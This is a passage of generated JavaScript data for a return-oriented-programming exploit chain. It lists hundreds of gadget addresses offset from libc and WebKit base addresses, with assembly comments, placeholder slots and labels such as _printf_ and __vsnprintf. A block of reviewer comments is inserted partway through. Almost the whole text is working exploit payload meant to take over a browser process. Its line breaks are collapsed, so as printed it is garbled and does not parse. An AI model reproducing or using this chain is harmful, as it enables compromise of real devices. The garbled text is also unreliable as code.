set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+549872, //L12171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+549904, //L12173 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+549888, //L12172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12171: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12172: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12173: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+550080, //L12175 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+550096, //L12176 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+550064, //L12174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L12174: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12175: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12176: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+550208, //L12178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+550256, //L12181 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+550224, //L12179 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L12178: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L12179: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12180: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12181: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+550368, //L12182+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+550360, //L12182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L12182: db([0, 0]); // 0x0 set_gadgets([ ropchain+550384, //L12182+24 ropchain+550712, //L12177 libc_base+764760, //pop rsi ropchain+550424, //L12183 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12183: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12185: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+550544, //L12188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+550528, //L12186 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12186: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12188: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+550688, //L12192 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+550656, //L12190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+550672, //L12191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12190: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12191: 
db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12192: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+551280, //L12189 //L12177: libc_base+764760, //pop rsi ropchain+550752, //L12193 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12193: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12195: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+550872, //L12198 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+550856, //L12196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12196: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12198: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+551016, //L12201 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+550984, //L12199 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+551000, //L12200 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12199: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12200: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12201: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+551112, //L12203 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12202: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L12203: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12204: db([1, 0]); // 
0x1 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+551216, //L12205 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+551232, //L12206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12205: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12206: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx //L12189: libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+551352, //L12207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12207: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12209: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+551472, //L12212 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+551456, //L12210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12210: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12212: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+551616, //L12215 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+551584, //L12213 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+551600, //L12214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 
//pop rcx ]); //L12213: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12214: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12215: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+551696, //L12216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L12216: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12217: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12218: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+551888, //L12222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+551856, //L12220 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+551872, //L12221 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12219: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L12220: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12221: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12222: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+551944, //L12224 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L12224: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+552072, //L12226 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+552088, //L12227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+552056, 
//L12225 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12225: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L12226: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12227: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+552168, //L12228 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+552184, //L12229 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12228: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12229: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+552280, //L12231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+552264, //L12230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12230: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12231: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+552360, //L12232 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12232: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12234: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+552480, //L12237 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+552464, //L12235 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12235: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12237: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+552560, //L12239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+552592, //L12241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12239: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L12240: ropchain+552720, //L12238 libc_base+144605 //pop rdi ]); //L12241: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+552696, //L12243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+552712, //L12242 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12243: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12242: db([0, 0]); // 0x0 //L12238: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+552792, //L12244 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12244: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12246: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+552912, //L12249 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+552896, //L12247 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12247: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12249: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi 
ropchain+553088, //L12252 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+553104, //L12253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+553056, //L12250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+553072, //L12251 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12250: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L12251: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12252: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12253: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+553216, //L12254 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+553248, //L12256 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+553232, //L12255 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12254: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12255: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12256: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+553352, //L12257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+553368, //L12258 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12257: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12258: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] 
libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+553488, //L12259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+553472, //L12260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12260: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12259: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+553576, //L12262 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+553560, //L12261 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12261: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12262: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+553680, //L12263 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+553696, //L12264 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12263: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12264: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+553816, //L12265 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+553800, //L12266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12266: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12265: db([0, 0]); // 0x0 
// Section `_printf_` of the generated chain data (it continues on the following lines).
// Reading guide: set_gadget()/set_gadgets() append 64-bit values to ropchain_array and
// db() appends raw 32-bit words, so `db([4294967288, 4294967295])` is the 64-bit
// constant -0x8. `ropchain+N` operands are byte offsets into this same buffer and are
// annotated with the label they point at; a `db([0, 0])` slot whose label is referenced
// that way is a placeholder that the preceding `mov [rsi], rax` store fills at run time.
// Every code address is a fixed offset from libc_base/webkit_base, so the data is tied
// to the exact module builds it was generated against.
// NOTE(review): presumably the payload's printf wrapper — further down, this section
// stages the `__out_char` label and transfers to `__vsnprintf`; confirm against the
// original source of the chain.
// NOTE(review): line breaks were lost on this page; as printed, each `//` comment runs
// to the end of the physical line, so this text does not parse as the original script.
//_printf_: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+553888, //L12268 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L12268: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+553952, //L12270 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L12270: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([16, 0]); // 0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+554040, //L12272 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L12271: db([16, 0]); // 0x10 set_gadget(libc_base+759608,); //pop rax //L12272: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+554096, //L12273 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12273: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12275: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12276: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12278: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+554272, //L12281 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+554256, //L12279 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12279: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L12281: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+554416, //L12284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+554384, //L12282 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+554400, //L12283 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12282: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12283: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12284: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+554496, //L12285 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12285: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12287: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+554616, //L12290 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+554600, //L12288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12288: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12290: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+554760, //L12293 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+554728, //L12291 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+554744, //L12292 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L12291: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12292: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12293: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L12294: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L12295: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L12296: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+555032, //L12298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+555048, //L12299 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+555016, //L12297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L12297: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12298: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12299: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+555144, //L12301 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+555128, //L12300 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12300: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12301: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 
set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+555240, //L12303 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L12302: db([4294967287, 4294967295]); // -0x9 set_gadget(libc_base+759608,); //pop rax //L12303: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L12304: ropchain+167544, //__out_char libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L12306: ropchain+555400, //L12305 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+317712, //__vsnprintf //L12305: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+555472, //L12307 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12307: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12309: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L12311: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+555632, //L12314 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+555616, //L12312 webkit_base+660161, //mov [rsi], rax ; mov 
